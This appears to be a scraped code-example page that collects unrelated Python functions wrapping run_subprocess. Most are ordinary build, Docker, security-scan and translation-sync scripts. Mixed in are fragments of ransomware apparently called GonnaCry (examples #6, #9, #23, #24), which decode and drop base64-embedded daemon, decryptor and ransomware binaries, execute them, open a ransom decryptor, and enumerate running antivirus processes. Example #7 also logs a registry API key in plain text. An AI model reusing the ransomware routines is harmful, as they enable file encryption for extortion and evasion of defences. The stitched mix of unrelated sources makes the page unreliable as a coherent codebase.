コード例 #1
0
ファイル: build.py プロジェクト: sharpsteve/wrye-bash
def build_executable(version, file_version):
    """ Builds the executable. """
    LOGGER.info("Building executable...")
    build_folder = os.path.join(MOPY_PATH, u"build")
    dist_folder = os.path.join(MOPY_PATH, u"dist")
    setup_orig = os.path.join(WBSA_PATH, u"setup.py")
    setup_target = os.path.join(MOPY_PATH, u"setup.py")
    exe_orig = os.path.join(dist_folder, u"Wrye Bash Launcher.exe")
    exe_target = os.path.join(MOPY_PATH, u"Wrye Bash.exe")
    cpy(setup_orig, setup_target)
    try:
        # Call the setup script
        utils.run_subprocess([
            sys.executable, setup_target, "py2exe", "--version", file_version
        ],
                             LOGGER,
                             cwd=MOPY_PATH)
        # Copy the exe's to the Mopy folder
        cpy(exe_orig, exe_target)
    finally:
        # Clean up py2exe generated files/folders
        rm(setup_target)
        rm(build_folder)
        rm(dist_folder)
    try:
        yield
    finally:
        rm(exe_target)
コード例 #2
0
def cleanup(args):
    """
    Cleaning up the resources before creating new containers.
    The will do the followings:
        - get the image list to remove
        - remove rt and db2 containers
        - remove volume and network
        - remove images

    Args:
        args ([dict]): the arguments passed to the script
    """

    # clean up before creating new containers
    remove_images = get_remove_image_list(args)
    if len(remove_images) == 0:
        return

    # disconnect the containers and network
    main_logger.info(
        f"Disconnecting runtime container {RT_SCAN} from network {NETWORK_SCAN}..."
    )
    cleanup_helper(f"docker network disconnect -f {NETWORK_SCAN} {RT_SCAN}")
    main_logger.info(
        f"Disconnecting db2 container {DB2_SCAN} from network {NETWORK_SCAN}..."
    )
    cleanup_helper(f"docker network disconnect -f {NETWORK_SCAN} {DB2_SCAN}")

    # removing runtime container
    main_logger.info(f"Removing runtime container {RT_SCAN}...")
    cleanup_helper(f"docker rm -f {RT_SCAN}")

    # removing runtime container
    try:
        main_logger.info(f"Removing db2 container {DB2_SCAN}...")
        cleanup_helper(f"docker rm -f {DB2_SCAN}")
    except Exception as e:
        main_logger.info(e)

    # removing runtime container
    try:
        main_logger.info(f"Removing volume {VOL_SCAN}...")
        cleanup_helper(f"docker volume rm -f {VOL_SCAN}")
    except Exception as e:
        main_logger.info(e)

    # removing scan network
    try:
        main_logger.info(f"Removing network {NETWORK_SCAN}")
        run_subprocess(f"docker network rm {NETWORK_SCAN}")
    except Exception as e:
        main_logger.info(e)

    # removing images
    for image in remove_images:
        try:
            main_logger.info(f"Removing image {image}...")
            cleanup_helper(f"docker rmi {image}")
        except Exception as e:
            main_logger.info(e)
コード例 #3
0
ファイル: build.py プロジェクト: sharpsteve/wrye-bash
def pack_installer(nsis_path, version, file_version):
    """ Packages the installer version. """
    script_path = os.path.join(SCRIPTS_PATH, u"build", u"installer",
                               u"main.nsi")
    if not os.path.exists(script_path):
        raise IOError("Could not find nsis script '{}', aborting "
                      "installer creation.".format(script_path))
    nsis_root = get_nsis_root(nsis_path)
    download_redists()
    nsis_path = os.path.join(nsis_root, "makensis.exe")
    if not os.path.isfile(nsis_path):
        raise IOError(
            "Could not find 'makensis.exe', aborting installer creation.")
    # Build the installer
    utils.run_subprocess(
        [
            nsis_path,
            "/NOCD",
            "/DWB_NAME=Wrye Bash {}".format(version),
            "/DWB_OUTPUT={}".format(DIST_PATH),
            "/DWB_FILEVERSION={}".format(file_version),
            "/DWB_CLEAN_MOPY={}".format(MOPY_PATH),
            script_path,
        ],
        LOGGER,
    )
コード例 #4
0
def install_loot_api(version, revision, dl_dir, destination_path):
    url = ("https://github.com/loot/loot-api-python/releases/download/"
           "{0}/loot_api_python-{0}-0-g{1}_master-python2.7-win32.7z".format(
               version, revision))
    archive_path = os.path.join(dl_dir, "loot_api.7z")
    seven_zip_folder = os.path.join(MOPY_PATH, "bash", "compiled")
    seven_zip_path = os.path.join(seven_zip_folder, "7z.exe")
    loot_dll = os.path.join(destination_path, "loot.dll")
    loot_api_pyd = os.path.join(destination_path, "loot_api.pyd")
    if os.path.exists(loot_dll):
        os.remove(loot_dll)
    if os.path.exists(loot_api_pyd):
        os.remove(loot_api_pyd)
    LOGGER.info("Downloading LOOT API Python wrapper...")
    LOGGER.debug("Download url: {}".format(url))
    LOGGER.debug(
        "Downloading LOOT API Python wrapper to {}".format(archive_path))
    utils.download_file(url, archive_path)
    LOGGER.info("Extracting LOOT API Python wrapper to " +
                utils.relpath(destination_path))
    command = [
        seven_zip_path,
        "e",
        archive_path,
        "-y",
        "-o" + destination_path,
        "*/loot.dll",
        "*/loot_api.pyd",
    ]
    utils.run_subprocess(command, LOGGER)
    os.remove(archive_path)
コード例 #5
0
def docker_logout():
    """
    Logout of the registry.
    """
    main_logger.info(f"#### Logout of {JFROG_REGISTRY} ####")
    run_subprocess(
        f"docker logout {JFROG_REGISTRY}",
        logger=main_logger,
    )
コード例 #6
0
def open_decryptor():
    process = subprocess.Popen("pidof decryptor", shell=True, stdout=subprocess.PIPE,
                               stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    output = process.stdout.read() + process.stderr.read()
    if(output):
        return
    
    os.chdir(variables.ransomware_path)
    utils.run_subprocess('gnome-terminal --command .{}'.format(variables.decryptor_path))
    utils.run_subprocess('xfce4-terminal --command=.{}'.format(variables.decryptor_path))
コード例 #7
0
def docker_login():
    """
    Login to the registry.
    """
    main_logger.info(f"#### Login to {JFROG_REGISTRY} ####")
    main_logger.info(
        f"docker login -u {JFROG_USER} -p {JFROG_APIKEY} {JFROG_REGISTRY}")
    run_subprocess(
        f"docker login -u {JFROG_USER} -p {JFROG_APIKEY} {JFROG_REGISTRY}",
        logger=main_logger,
    )
コード例 #8
0
def cleanup_helper(cmd):
    """
    Clean up helper to run the command passed by cleanup func

    Args:
        cmd ([str]): the command to to in subprocess
    """
    try:
        run_subprocess(cmd)
    except Exception as e:
        main_logger.warning(e)
コード例 #9
0
def drop_daemon_and_decryptor():
    with open(variables.decryptor_path,'wb') as f:
        f.write(base64.b64decode(variables.decryptor))

    with open(variables.daemon_path, 'wb') as f:
        f.write(base64.b64decode(variables.daemon))

    os.chdir(variables.ransomware_path)
    os.system('chmod +x daemon')
    os.system('chmod +x decryptor')
    utils.run_subprocess('./daemon')
コード例 #10
0
def install_msvc_redist(dl_dir, url=None):
    if url is None:
        url = (
            "https://download.visualstudio.microsoft.com/download/pr/749aa419-f9e4-45"
            "78-a417-a43786af205e/d59197078cc425377be301faba7dd87a/vc_redist.x86.exe"
        )
    LOGGER.info("Downloading MSVC Redist...")
    LOGGER.debug("Download url: {}".format(url))
    dl_file = os.path.join(dl_dir, "vc_redist.exe")
    LOGGER.debug("Downloading MSVC Redist to {}".format(dl_file))
    utils.download_file(url, dl_file)
    LOGGER.info("Installing the MSVC redistributable...")
    command = [dl_file, "/quiet"]
    utils.run_subprocess(command, LOGGER)
    os.remove(dl_file)
コード例 #11
0
def download_depcheck_tool(download_dir):
    """
    Download depcheck tool.

    Args:
        download_dir ([str]): the directory to download the depcheck tool to
    """
    main_logger.info("Downloading updated dependency check tool...")
    res = requests.get(DEPCHECK_REPO)
    tag_name = res.json()["tag_name"].replace("v", "")
    download_url = f"https://github.com/jeremylong/DependencyCheck/releases/download/v{tag_name}/dependency-check-{tag_name}-release.zip"
    res = requests.get(download_url, allow_redirects=True)
    zip = zipfile.ZipFile(io.BytesIO(res.content))
    zip.extractall(f"{download_dir}")
    run_subprocess(
        f"chmod +x {download_dir}/dependency-check/bin/dependency-check.sh")
コード例 #12
0
def get_reports(args):
    """Get the reports for the scans

    Args:
        args ([dict]): the arguments passed to the script
    """
    if args.type == ALL:
        static_reports(args)
        dynamic_reports(args)
    elif args.type == STATIC:
        static_reports(args)
    elif args.type == DYNAMIC:
        dynamic_reports(args)

    # copy reports to output directory
    run_subprocess(
        f"rsync -a -v --ignore-existing {os.getcwd()}/reports {args.output}")
コード例 #13
0
def start_rt_container(args, image_tag, rt_name=RT_SCAN, logger=main_logger):
    """
    Start the rt container for deployment

    Args:
        args ([dict]): the arguments passed to the script
        image_tag ([str]): the tag of the image
        logger ([logging], optional): the logger to log the output. Defaults to main_logger.

    Raises:
        Exception: exception raised when spinning up runtime container
    """
    # login to registry
    docker_login()

    network = "" if args.mode == DEPCHECK else f"--network={NETWORK_SCAN}"
    port = "" if args.mode == DEPCHECK else "-p 9080:9080"

    try:
        try:
            logger.info(f"Trying {image_tag}")
            rt_image_repo = f"{JFROG_REGISTRY}/oms-{args.version}-db2-rt:{image_tag}-liberty"
            logger.info(
                f"#### STARTING RT CONTAINER: {rt_name} - {rt_image_repo} ####"
            )
            run_subprocess(
                f" \
                docker run -di --name {rt_name} --privileged \
                {network} \
                -e DB_HOST={DB2_SCAN} \
                -e DB_PORT=50000 \
                -e DB_VENDOR=db2 \
                -e DB_NAME=OMDB \
                {port} \
                {rt_image_repo}",
                logger=logger,
            )
        except Exception as e:
            logger.warning(e)
    except Exception as e:
        logger.error(traceback.format_exc())
        logger.error(e)
        raise Exception

    # logout of registry
    docker_logout()
コード例 #14
0
def start_db2_container(args, image_tag, logger=main_logger):
    """
    Start the db2 container for deployment.

    Args:
        args ([str]): the arguments passed to the script
        image_tag ([str]): the tag of the image
        logger ([logging], optional): the logger to log the output. Defaults to main_logger.

    Raises:
        Exception: exception raised when running subprocess
    """
    try:
        db_image_repo = f"{JFROG_REGISTRY}/oms-{args.version}-db2-db:{image_tag}-refs"
        logger.info(
            f"#### STARTING DB2 CONTAINER: {DB2_SCAN} - {db_image_repo} ####")

        try:
            run_subprocess(f"docker network rm {NETWORK_SCAN}")
        except Exception as e:
            pass

        run_subprocess(
            f" \
            docker volume create {VOL_SCAN} && \
            docker network create {NETWORK_SCAN} && \
            docker run -di --name {DB2_SCAN} --privileged \
            --network={NETWORK_SCAN} \
            -e DB2INSTANCE=db2inst1 \
            -e DB2INST1_PASSWORD=db2inst1 \
            -e DB_USER=omsuser \
            -e DB_PASSWORD=omsuser \
            -e LICENSE=accept \
            -e DBNAME=omdb \
            -e AUTOCONFIG=false \
            -v {VOL_SCAN}:/database \
            -p 50005:50000 {db_image_repo} && \
            chmod +x {os.getcwd()}/waitDB2.sh && \
            /bin/bash {os.getcwd()}/waitDB2.sh {DB2_SCAN}",
            logger=logger,
        )
    except Exception as e:
        # logger.error(traceback.format_exc())
        logger.warning(e)
        raise Exception
コード例 #15
0
def build_source_code(args):
    """
    Build the source code to prep for the scans.

    Args:
        args ([dict]): the arguments passed to the script
    """
    # main_logger.info("Setting up environment...")
    # run_subprocess(f"cd {args.source}/Build && ./gradlew -b fullbuild.gradle setupEnvironment --stacktrace")

    # main_logger.info("Setting 3rd party libs...")
    # run_subprocess(f"cd {args.source}/Build && ./gradlew -b fullbuild.gradle unpack3p")

    # main_logger.info("Cleaning projects...")
    # run_subprocess(f"cd {args.source} && Build/gradlew clean")

    main_logger.info("Removing irx files...")
    run_subprocess(f'cd {args.source} && find . -name "*.irx" -type f -delete')
コード例 #16
0
def main():
    try:
        args = parse_arguments()
        main_logger.info(args)
        if args.mode == SCAN:
            run_scan(args)
        elif args.mode == REPORTS:
            get_reports(args)
        elif args.mode == DEPCHECK:
            depcheck(args)
    except Exception as e:
        main_logger.info(e)
        try:
            run_subprocess(f"docker network rm {NETWORK_SCAN}")
        except Exception as _:
            main_logger.warning(f"Error removing {NETWORK_SCAN}")
        try:
            run_subprocess(f"docker volume rm {VOL_SCAN}")
        except Exception as _:
            main_logger.warning(f"Error removing {VOL_SCAN}")
コード例 #17
0
def download_crowdin(base_path, branch, xml, username, config_dict, crowdin_path):
    extracted = []
    for i, cfg in enumerate(config_dict["files"]):
        print(f"\nDownloading translations from Crowdin ({config_dict['headers'][i]})")
        cmd = [crowdin_path, "download", f"--branch={branch}", f"--config={cfg}"]
        comm, ret = utils.run_subprocess(cmd, show_spinner=True)
        if ret != 0:
            print(f"Failed to download:\n{comm[1]}", file=sys.stderr)
            sys.exit(1)
        extracted += get_extracted_files(comm[0], branch)

    upload_translations_gerrit(extracted, xml, base_path, branch, username)
コード例 #18
0
ファイル: upload.py プロジェクト: LineageOS/cm_crowdin
def upload_sources_crowdin(branch, config_dict, crowdin_path):
    global _HAS_UPLOADED
    for i, cfg in enumerate(config_dict["files"]):
        print(f"\nUploading sources to Crowdin ({config_dict['headers'][i]})")
        cmd = [
            crowdin_path,
            "upload",
            "sources",
            f"--branch={branch}",
            f"--config={cfg}",
        ]
        comm, ret = utils.run_subprocess(cmd, show_spinner=True)
        if ret != 0:
            print(f"Failed to upload:\n{comm[1]}", file=sys.stderr)
            sys.exit(1)
    _HAS_UPLOADED = True
コード例 #19
0
ファイル: upload.py プロジェクト: LineageOS/cm_crowdin
def upload_translations_crowdin(branch, config_dict, crowdin_path):
    global _HAS_UPLOADED
    for i, cfg in enumerate(config_dict["files"]):
        print(
            f"\nUploading translations to Crowdin ({config_dict['headers'][i]})"
        )
        cmd = [
            crowdin_path,
            "upload",
            "translations",
            f"--branch={branch}",
            "--no-import-duplicates",
            "--import-eq-suggestions",
            "--auto-approve-imported",
            f"--config={cfg}",
        ]
        comm, ret = utils.run_subprocess(cmd, show_spinner=True)
        if ret != 0:
            print(f"Failed to upload:\n{comm[1]}", file=sys.stderr)
            sys.exit(1)
    _HAS_UPLOADED = True
コード例 #20
0
def get_open_changes(branch, username, owner):
    print("Fetching open changes on gerrit")

    # If an owner is specified, modify the query, so we only get the ones wanted
    owner_arg = "" if owner is None else f"owner:{owner}"

    # Find all open translation changes
    cmd = utils.get_gerrit_base_cmd(username) + [
        "query",
        "status:open",
        f"branch:{branch}",
        owner_arg,
        'message:"Automatic translation import"',
        "topic:translation",
        "--current-patch-set",
        "--format=JSON",
    ]
    msg, code = utils.run_subprocess(cmd)
    if code != 0:
        print(f"Failed: {msg[1]}", file=sys.stderr)
        sys.exit(1)

    changes = {}
    # Each line is one valid JSON object, except the last one, which is empty
    for line in msg[0].strip("\n").split("\n"):
        try:
            js = json.loads(line)
            revision = js["currentPatchSet"]["revision"]
            changes[revision] = js["url"]
        except KeyError:
            continue
        except Exception as e:
            print(
                e,
                f"Failed to read revision from fetched dataset:\n{line}",
                file=sys.stderr,
            )

    return changes
コード例 #21
0
def vote(branch, username, owner):
    commits = 0
    changes = get_open_changes(branch, username, owner)
    for change in changes:
        print(f"Voting on commit {changes[change]}: ", end="")
        # Add Code-Review +1 and Verified+1 labels
        cmd = utils.get_gerrit_base_cmd(username) + [
            "review",
            "--verified +1",
            "--code-review +1",  # we often can't self-CR+2 (limited by admin), submitter needs to do that
            change,
        ]
        msg, code = utils.run_subprocess(cmd, True)
        if code != 0:
            error_text = msg[1].replace("\n\n", "; ").replace("\n", "")
            print(f"Failed! -- {error_text}")
        else:
            print("Success")

        commits += 1

    if commits == 0:
        print("Nothing to vote on!")
コード例 #22
0
def submit(branch, username, owner):
    commits = 0
    changes = get_open_changes(branch, username, owner)
    for change in changes:
        print(f"Submitting commit {changes[change]}: ", end="")
        # Add Code-Review +2 and Verified+1 labels and submit
        cmd = utils.get_gerrit_base_cmd(username) + [
            "review",
            "--verified +1",
            "--code-review +2",
            "--submit",
            change,
        ]
        msg, code = utils.run_subprocess(cmd, True)
        if code != 0:
            error_text = msg[1].replace("\n\n", "; ").replace("\n", "")
            print(f"Failed! -- {error_text}")
        else:
            print("Success")

        commits += 1

    if commits == 0:
        print("Nothing to submit!")
コード例 #23
0
def check_av():
    av_list = [
        'a2adguard.exe', 'a2adwizard.exe', 'a2antidialer.exe', 'a2cfg.exe',
        'a2cmd.exe', 'a2free.exe', 'a2guard.exe', 'a2hijackfree.exe',
        'a2scan.exe', 'a2service.exe', 'a2start.exe', 'a2sys.exe', 'a2upd.exe',
        'aavgapi.exe', 'aawservice.exe', 'aawtray.exe', 'ad-aware.exe',
        'ad-watch.exe', 'alescan.exe', 'anvir.exe', 'ashdisp.exe',
        'ashmaisv.exe', 'ashserv.exe', 'ashwebsv.exe', 'aswupdsv.exe',
        'atrack.exe', 'avgagent.exe', 'avgamsvr.exe', 'avgcc.exe',
        'avgctrl.exe', 'avgemc.exe', 'avgnt.exe', 'avgtcpsv.exe',
        'avguard.exe', 'avgupsvc.exe', 'avgw.exe', 'avkbar.exe', 'avk.exe',
        'avkpop.exe', 'avkproxy.exe', 'avkservice.exe', 'avktray',
        'avktray.exe', 'avkwctl', 'avkwctl.exe', 'avmailc.exe', 'avp.exe',
        'avpm.exe', 'avpmwrap.exe', 'avsched32.exe', 'avwebgrd.exe',
        'avwin.exe', 'avwupsrv.exe', 'avz.exe', 'bdagent.exe', 'bdmcon.exe',
        'bdnagent.exe', 'bdss.exe', 'bdswitch.exe', 'blackd.exe',
        'blackice.exe', 'blink.exe', 'boc412.exe', 'boc425.exe', 'bocore.exe',
        'bootwarn.exe', 'cavrid.exe', 'cavtray.exe', 'ccapp.exe',
        'ccevtmgr.exe', 'ccimscan.exe', 'ccproxy.exe', 'ccpwdsvc.exe',
        'ccpxysvc.exe', 'ccsetmgr.exe', 'cfgwiz.exe', 'cfp.exe', 'clamd.exe',
        'clamservice.exe', 'clamtray.exe', 'cmdagent.exe', 'cpd.exe',
        'cpf.exe', 'csinsmnt.exe', 'dcsuserprot.exe', 'defensewall.exe',
        'defensewall_serv.exe', 'defwatch.exe', 'f-agnt95.exe', 'fpavupdm.exe',
        'f-prot95.exe', 'f-prot.exe', 'fprot.exe', 'fsaua.exe', 'fsav32.exe',
        'f-sched.exe', 'fsdfwd.exe', 'fsm32.exe', 'fsma32.exe', 'fssm32.exe',
        'f-stopw.exe', 'f-stopw.exe', 'fwservice.exe', 'fwsrv.exe',
        'iamstats.exe', 'iao.exe', 'icload95.exe', 'icmon.exe', 'idsinst.exe',
        'idslu.exe', 'inetupd.exe', 'irsetup.exe', 'isafe.exe', 'isignup.exe',
        'issvc.exe', 'kav.exe', 'kavss.exe', 'kavsvc.exe', 'klswd.exe',
        'kpf4gui.exe', 'kpf4ss.exe', 'livesrv.exe', 'lpfw.exe', 'mcagent.exe',
        'mcdetect.exe', 'mcmnhdlr.exe', 'mcrdsvc.exe', 'mcshield.exe',
        'mctskshd.exe', 'mcvsshld.exe', 'mghtml.exe', 'mpftray.exe',
        'msascui.exe', 'mscifapp.exe', 'msfwsvc.exe', 'msgsys.exe',
        'msssrv.exe', 'navapsvc.exe', 'navapw32.exe', 'navlogon.dll',
        'navstub.exe', 'navw32.exe', 'nisemsvr.exe', 'nisum.exe', 'nmain.exe',
        'noads.exe', 'nod32krn.exe', 'nod32kui.exe', 'nod32ra.exe',
        'npfmntor.exe', 'nprotect.exe', 'nsmdtr.exe', 'oasclnt.exe',
        'ofcdog.exe', 'opscan.exe', 'ossec-agent.exe', 'outpost.exe',
        'paamsrv.exe', 'pavfnsvr.exe', 'pcclient.exe', 'pccpfw.exe',
        'pccwin98.exe', 'persfw.exe', 'protector.exe', 'qconsole.exe',
        'qdcsfs.exe', 'rtvscan.exe', 'sadblock.exe', 'safe.exe',
        'sandboxieserver.exe', 'savscan.exe', 'sbiectrl.exe', 'sbiesvc.exe',
        'sbserv.exe', 'scfservice.exe', 'sched.exe', 'schedm.exe',
        'schedulerdaemon.exe', 'sdhelp.exe', 'serv95.exe', 'sgbhp.exe',
        'sgmain.exe', 'slee503.exe', 'smartfix.exe', 'smc.exe',
        'snoopfreesvc.exe', 'snoopfreeui.exe', 'spbbcsvc.exe', 'sp_rsser.exe',
        'spyblocker.exe', 'spybotsd.exe', 'spysweeper.exe', 'spysweeperui.exe',
        'spywareguard.dll', 'spywareterminatorshield.exe', 'ssu.exe',
        'steganos5.exe', 'stinger.exe', 'swdoctor.exe', 'swupdate.exe',
        'symlcsvc.exe', 'symundo.exe', 'symwsc.exe', 'symwscno.exe',
        'tcguard.exe', 'tds2-98.exe', 'tds-3.exe', 'teatimer.exe',
        'tgbbob.exe', 'tgbstarter.exe', 'tsatudt.exe', 'umxagent.exe',
        'umxcfg.exe', 'umxfwhlp.exe', 'umxlu.exe', 'umxpol.exe', 'umxtray.exe',
        'usrprmpt.exe', 'vetmsg9x.exe', 'vetmsg.exe', 'vptray.exe',
        'vsaccess.exe', 'vsserv.exe', 'wcantispy.exe', 'win-bugsfix.exe',
        'winpatrol.exe', 'winpa""rolex.exe', 'wrsssdk.exe', 'xcommsvr.exe',
        'xfr.exe', 'xp-antispy.exe', 'zegarynka.exe', 'zlclient.exe'
    ]

    command = 'tasklist /v /fo csv | findstr /i {}'

    for process in av_list:
        utils.run_subprocess(command.format(process))
コード例 #24
0
def drop_n_run_gonnacry():
    with open(variables.gonnacry_path, 'wb') as f:
        f.write(base64.b64decode(variables.gonnacry))

    command = '.{}'.format(variables.gonnacry_path)
    utils.run_subprocess(command)
コード例 #25
0
ファイル: build.py プロジェクト: sharpsteve/wrye-bash
def pack_7z(archive, *args):
    cmd_7z = [EXE_7z, "a", "-m0=lzma2", "-mx9", archive, "Mopy/"] + list(args)
    utils.run_subprocess(cmd_7z, LOGGER, cwd=ROOT_PATH)
コード例 #26
0
def pack_7z(archive_, *args):
    cmd_7z = [EXE_7z, u'a', u'-m0=lzma2', u'-mx9', archive_, u'Mopy/'
              ] + list(args)
    utils.run_subprocess(cmd_7z, LOGGER, cwd=ROOT_PATH)
コード例 #27
0
def static_scan(args):
    """
    Prepare and run the static scan.

    Args:
        args ([dict]): the arguments passed to the script
    """

    # prepare the header for requests
    file_req_header = {"Authorization": f"Bearer {get_bearer_token()}"}

    # remove the old scans
    old_scan_status_dict = remove_old_scans(SINGLE_STATIC)

    # build source code
    main_logger.info(f"Building source code...")
    build_source_code(args)

    # read the list of projects to scan
    main_logger.info(f"Getting the projects...")
    projects = get_projects()

    # the below block of code would do:
    # - create tempdir to store the config files
    # - go through the list of projects
    # - generate the irx file for each project
    # - upload the generated irx file to ASoC
    # - create and execute the static scan
    with tempfile.TemporaryDirectory(dir=os.getcwd()) as tmpdir:
        main_logger.debug(f"PROJECTS TO SCAN: {projects}")
        for project in projects:
            project = project.strip()
            project_file_name = project.strip().replace("/", "_")
            print()
            main_logger.info(
                "#" *
                (len(f"PROCESSING PROJECT: {project} - {project_file_name}") +
                 PADDING))
            main_logger.info(
                " " * int((PADDING / 2)) +
                f"PROCESSING PROJECT: {project} - {project_file_name}" +
                " " * int((PADDING / 2)), )
            main_logger.info(
                "#" *
                (len(f"PROCESSING PROJECT: {project} - {project_file_name}") +
                 PADDING))

            # if the old scan still pending, skip
            if (project in old_scan_status_dict
                    and old_scan_status_dict[project] in PENDING_STATUSES):
                main_logger.info(f"{project} is PENDING/RUNNING")
                continue

            # generate config file for appscan
            generate_appscan_config_file(args, project)
            main_logger.info(f"Generating {project_file_name}.irx file...")
            run_subprocess(
                f"source ~/.bashrc && appscan.sh prepare -c {APPSCAN_CONFIG_TMP} -n {project_file_name}.irx -d {tmpdir}"
            )

            # call ASoC API to create the static scan
            try:
                main_logger.info(
                    f"Calling ASoC API to create the static scan...")
                with open(f"{tmpdir}/{project_file_name}.irx",
                          "rb") as irx_file:
                    file_data = {"fileToUpload": irx_file}

                    res = requests.post(f"{ASOC_API_ENDPOINT}/FileUpload",
                                        files=file_data,
                                        headers=file_req_header)
                    if res.status_code == 201:
                        data = {
                            "ARSAFileId": res.json()["FileId"],
                            "ScanName": project,
                            "AppId": SINGLE_STATIC,
                            "Locale": "en-US",
                            "Execute": "true",
                            "Personal": "false",
                        }
                        res = requests.post(
                            f"{ASOC_API_ENDPOINT}/Scans/StaticAnalyzer",
                            json=data,
                            headers=headers)
                    main_logger.info(f"Response: {res.json()}")
                    main_logger.info(
                        f"PROJECT: {project} - {project_file_name} WAS PROCESSED SUCCESSFULLY."
                    )
                    print()
            except Exception as e:
                main_logger.warning(traceback.format_exc())
                main_logger.warning(e)
コード例 #28
0
def depcheck(args):
    """
    Run and export report for the dependency check.

    Args:
        args ([dict]): the arguments passed to the script
    """
    try:
        # get the image tag
        image_tags = get_latest_stable_image_tags()

        # start runtime container
        try:
            for image_tag in image_tags:
                print()
                main_logger.info("#" * (len(f"Trying {image_tag}") + PADDING))
                main_logger.info(" " * int((PADDING / 2)) +
                                 f"Trying {image_tag}" +
                                 " " * int((PADDING / 2)))
                main_logger.info("#" * (len(f"Trying {image_tag}") + PADDING))
                try:
                    start_rt_container(args, image_tag, rt_name=DEPCHECK_SCAN)
                except Exception as e:
                    main_logger.warning(e)
                    continue
                break
        except Exception as e:
            main_logger.warning(e)

        # build the ear
        main_logger.info("Building ear file...")
        run_subprocess(
            f'docker exec {DEPCHECK_SCAN} bash -lc "buildear -warfiles=smcfs,sbc,sma,isccs,wsc"'
        )

        # creating the source dir
        with tempfile.TemporaryDirectory(dir=os.getcwd()) as tmpdir:

            # copy the ear to tempdir
            main_logger.info("Copying the ear to tempdir...")
            run_subprocess(
                f"docker cp {DEPCHECK_SCAN}:/opt/ssfs/runtime/external_deployments/smcfs.ear {tmpdir}"
            )

            # extract war files from the ear
            run_subprocess(f"cd {tmpdir} && unzip smcfs.ear *.war")

            # extract jars
            apps = ["smcfs", "sma", "sbc", "isccs", "wsc"]

            create_dir(f"{tmpdir}/3rdpartyship")
            for app in apps:
                if app == "smcfs":
                    run_subprocess(
                        f"cd {tmpdir} && mkdir {app}jarsfolder && unzip -o -j smcfs.war yfscommon/* -d {app}jarsfolder/ -x  yfscommon/platform* -x yfscommon/smcfs* -x yfscommon/*.properties -x yfscommon/*ui.jar -x yfscommon/yantra* -x yfscommon/scecore* -x yfscommon/yc*"
                    )
                else:
                    run_subprocess(
                        f"cd {tmpdir} && mkdir {app}jarsfolder && unzip -o -j sma.war WEB-INF/lib/* -d {app}jarsfolder/ -x  WEB-INF/lib/platform*"
                    )
                run_subprocess(
                    f"cp -R {tmpdir}/{app}jarsfolder/* {tmpdir}/3rdpartyship")

            # download the latest depcheck
            download_depcheck_tool(tmpdir)

            # run dependency check
            reports_dir_path = f"reports/{get_date_str()}/{args.mode}"
            create_dir(reports_dir_path)
            run_subprocess(
                f"{tmpdir}/dependency-check/bin/dependency-check.sh -s {tmpdir}/3rdpartyship -o {reports_dir_path}/dependency_report.html --suppression {os.getcwd()}/suppressions.xml"
            )

            # copy reports to output directory
            run_subprocess(
                f"rsync -a -v --ignore-existing {os.getcwd()}/reports {args.output}"
            )

    except Exception as e:
        main_logger.warning(traceback.format_exc())
        main_logger.warning(e)
        run_subprocess(f"docker rm -f {DEPCHECK_SCAN}")
    finally:
        run_subprocess(f"docker rm -f {DEPCHECK_SCAN}")
コード例 #29
0
def prep_containers(args, image_tags):
    """
    Prepare the rt and db2 container. This function will do the followings:
        - login to the registry
        - start db2 and rt containers
        - build the ear for deployment
        - start liberty server
        - wait for the server to be ready
        - logout of the registry

    Args:
        args ([dict]): the arguments passed to the script
        image_tag ([str]): the tag of the image
    """

    # clean up
    cleanup(args)

    # login to registry
    docker_login()

    # starting db2 and rt containers
    main_logger.info("Starting db2 and rt containers...")
    for image_tag in image_tags:
        try:
            print()
            main_logger.info("#" * (len(f"Trying {image_tag}") + PADDING))
            main_logger.info(" " * int((PADDING / 2)) + f"Trying {image_tag}" +
                             " " * int((PADDING / 2)))
            main_logger.info("#" * (len(f"Trying {image_tag}") + PADDING))
            main_logger.info("Starting db2 and rt containers...")
            start_db2_container(args, image_tag)
            start_rt_container(args, image_tag)
            break
        except Exception as e:
            main_logger.warning(e)

    # build the ear
    main_logger.info("Building ear file...")
    run_subprocess(
        f'docker exec {RT_SCAN} bash -lc "buildear -warfiles=smcfs,sbc,sma,isccs,wsc"'
    )

    # start liberty server
    main_logger.info("Starting liberty server...")
    run_subprocess(f'docker exec {RT_SCAN} bash -lc "__lbstart"')

    # wait for deployment to be ready
    main_logger.info("Wait for deployment to be ready...")
    main_logger.info(
        f"Checking deployment @ {DEPLOY_SERVER}/smcfs/console/login.jsp...")
    wait_for_deployment()

    # check to see if we need to restart the server
    if needs_server_restart():
        # restart the server
        main_logger.info("Restarting liberty server...")
        run_subprocess(
            f'docker exec {RT_SCAN} bash -lc "__lbstop && __lbstart"')

        # wait again for deployment to be ready after restarting
        main_logger.info(
            "Waiting again for deployment to be ready after restarting...")
        main_logger.info(
            f"Checking deployment @ {DEPLOY_SERVER}/smcfs/console/login.jsp..."
        )
        wait_for_deployment()

    main_logger.info("The db2 and rt containers are up and running...")

    # logout of registry
    docker_logout()